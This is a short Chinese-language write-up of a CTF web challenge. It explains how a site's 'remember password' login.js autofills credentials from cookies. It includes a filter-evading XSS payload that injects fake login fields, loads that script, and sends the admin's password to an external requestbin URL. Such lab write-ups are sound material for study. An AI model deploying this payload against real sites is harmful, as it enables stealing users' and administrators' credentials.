看着WP复现的。。
前端的东西。还是不太懂
首先就登陆注册。随便注册个账户登上去。提示密码在源码中。
有个留言板。F12有过滤规则。还有个查看。估计是XSS这类的
在登陆处。有个login.js
if (document.cookie && document.cookie != '') {
var cookies = document.cookie.split('; ');
var cookie = {};
for (var i = 0; i < cookies.length; i++) {
var arr = cookies[i].split('=');
var key = arr[0];
cookie[key] = arr[1];
}
if(typeof(cookie['user']) != "undefined" && typeof(cookie['psw']) != "undefined"){
document.getElementsByName("username")[0].value = cookie['user'];
document.getElementsByName("password")[0].value = cookie['psw'];
}
}
大概是从cookie中取出值。然后放入cookie数组
最后将这个数组填入username。password框。
实现记住密码的功能。
我们可以调用这个js。然后自定义两个框。管理员访问的时候。就会将user。psw写入框中。然后通过http发送。
<incookieput type="text" name="username">
<incookieput type="password" name="password">
<scrcookieipt scookierc="./js/login.js"></scrcookieipt>
<scrcookieipt>
var psw = docucookiement.getcookieElementsByName("password")[0].value;
docucookiement.locacookietion="http://http.requestbin.buuoj.cn/1e8jfct1/?a="+psw;
</scrcookieipt>
不知道为啥。我用xss平台去打。。没反应。控制台也没任何csp的警告。